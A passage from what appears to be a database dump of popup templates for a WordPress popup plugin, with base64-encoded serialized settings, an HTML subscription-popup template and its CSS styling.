HdpdGggdGhpcmQgcGFydGllcyI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6MTM6IlNVQlNDUklCRSBOT1ciO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6ODoibG9naW5fYnkiO3M6ODoidXNlcm5hbWUiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czo1OiJMb2dpbiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSByZWdpc3RyYXRpb24gb24gW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk2OiJZb3UgcmVnaXN0ZXJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciByZWdpc3RyYXRpb24uIElmIHlvdSBkaWQgbm90IHJlZ2lzdGVyIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3M6MTIxOiJZb3UgaGF2ZSBuZXcgbWVtYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgbWVtYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjU6InR4dF8wIjtzOjM4NjoiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzLiBQb3AtdXBzIHdpdGggU2xpZGVyLCBMaWdodGJveCwgQ29udGFjdCBhbmQgU3Vic2NyaXB0aW9uIGZvcm1zIGFuZCBtb3JlOjwvcD48dWw+PGxpPlVubGltaXRlZCBDb250ZW50IEN1c3RvbWl6YXRpb248L2xpPjxsaT5BdXRvIE9wZW4gUG9wdXBzPC9saT48bGk+Q29udGFjdCBGb3JtIHdpdGggcG9wLXVwPC9saT48bGk+UG9wdXAgT3BlbmluZyBBbmltYXRpb25zPC9saT48bGk+VW5saW1pdGVkIENvbnRlbnQgQ3VzdG9taXphdGlvbjwvbGk+PGxpPlBvcHVwIE9wZW5pbmcgQW5pbWF0aW9uczwvbGk+PC91bD4iO3M6NToidHh0XzEiO3M6NzM6IjxwPlNVQlNDUklCRSBUTyBPVVIgTkVXU0xFVFRFUiBBTkQgU1RBUlQgSU5DUkVBU0lORyBZT1VSIFBST0ZJVFMgTk9XITwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMiI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_txt_1]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n				[txt_1]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 60%;\r\n  	box-shadow: rgba(32,32,32,1) 0 4px 20px;\r\n  	border-radius:3px;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: block;\r\n  	float: left;\r\n  	margin-top: 30px;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #56912d;\r\n	font-family: \'arial\', arial;\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	padding-left: 20px;\r\n	text-shadow: 0px 0px 1px #56912d;\r\n	-moz-text-shadow: 0px 0px 1px #56912d;\r\n	-webkit-text-shadow: 0px 0px 1px #56912d;\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	border-radius:3px;\r\n  	width: 40%;\r\n  	height: 110%;\r\n	display: block;\r\n  	float: right;\r\n  	box-shadow: rgba(32,32,32,1) 0 4px 20px;\r\n  	padding: 10px 0;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n  background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 1px solid #d1b36d;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 22px;\r\n  	font-size: 17px;\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/user-black-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 5px center;\r\n  	border-radius: 2px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-black-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 5px center;\r\n  	border-radius: 2px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	[if bg_type_2 == \'color\']\r\n  	background: [bg_color_2];\r\n    background-image: none;\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 100%;\r\n  	color: #888888;\r\n  	font-family: \'arial\', arial;\r\n	font-weight: 400;\r\n	line-height: 1.3;\r\n  	font-size: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 , #ppsPopupShell_[ID] .ppsPopupTxt_1  * {\r\n  	color:#ffffff;\r\n  	font-family: \'arial\', arial;\r\n  	font-weight: 700;\r\n  	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 25px;\r\n  	padding: 0 10px;\r\n  	margin: 0;\r\n  	letter-spacing: -1px;\r\n  	text-align: center;\r\n  	line-height: 1.475;\r\n    [if enb_txt_0]\r\n    width: 95;\r\n    [else]\r\n    width: 95%;\r\n    [endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	top:-20px;\r\n  	right:1px;\r\n  	z-index:99999;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n\r\n#ppsPopupShell_[ID] p{\r\n	margin-left:20px;\r\n}\r\n#ppsPopupShell_[ID] b{\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] ul li {\r\n	height:30px;\r\n}\r\n#ppsPopupShell_[ID] ul {\r\n	margin: 14px 0;\r\n  	padding: 0 0 0 40px;\r\n}','start-popup.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',26,0),(12,'Nature',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo1NTp7czo1OiJ3aWR0aCI7czozOiI2NzAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMCI7czozNzoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvbmF0dXJlLmpwZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjMjMyMzIzIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzgxZDc0MiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzU4NTg1OCI7czoxNToicmVzcG9uc2l2ZV9tb2RlIjtzOjM6ImRlZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czoxMToid2hpbGVfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjA6IiI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czoyMzoiU1VCU0NSSUJFIFRPIE5FV1NMRVRURVIiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5